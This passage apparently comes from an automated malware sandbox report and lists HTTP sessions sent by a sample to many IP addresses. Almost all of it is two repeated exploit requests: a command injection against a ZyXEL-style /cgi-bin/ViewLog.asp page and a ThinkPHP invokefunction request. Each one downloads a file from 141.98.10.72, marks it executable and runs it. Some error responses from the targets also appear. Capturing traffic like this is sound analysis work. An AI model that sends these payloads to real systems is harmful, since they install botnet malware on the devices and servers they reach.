                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:50.012358904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.668111086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:57.787254095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:07.769874096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:28.247020006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.201407909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            423192.168.2.234902094.121.130.1478080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:48.214734077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            424192.168.2.234878431.28.224.738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:48.414239883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:48.688575029 CET411INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 11:28:47 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            425192.168.2.235770231.33.8.128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:48.926964998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            426192.168.2.235851294.23.255.428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:49.137706041 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.348196983 CET304INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:49 GMT
                                                            Server: Apache
                                                            Content-Length: 126
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                            Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            427192.168.2.234257295.110.131.1158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:49.144731998 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.363785982 CET928INHTTP/1.1 404
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 732
                                                            Date: Wed, 14 Feb 2024 08:28:49 GMT
                                                            Keep-Alive: timeout=20
                                                            Connection: keep-alive
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 35 33 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.53</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            428192.168.2.2336370112.137.160.5480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:50.030636072 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:51.868145943 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:54.203831911 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:58.555218935 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:07.258044004 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:26.199317932 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:01.010452986 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            429192.168.2.233687288.248.141.22880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:50.294003010 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            430192.168.2.235898488.221.242.6380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:50.650444984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:51.006907940 CET478INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 256
                                                            Expires: Wed, 14 Feb 2024 08:28:50 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:50 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 30 39 30 65 63 34 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 30 26 23 34 36 3b 61 65 39 63 36 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2f090ec4&#46;1707899330&#46;ae9c67</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            431192.168.2.2339756112.167.5.22080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.305191040 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            432192.168.2.2357688112.153.134.3680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.330482960 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            433192.168.2.2334286112.197.68.11080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.397469997 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            434192.168.2.234237431.136.25.378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.598305941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.220101118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:53.467856884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:55.995656967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.114900112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
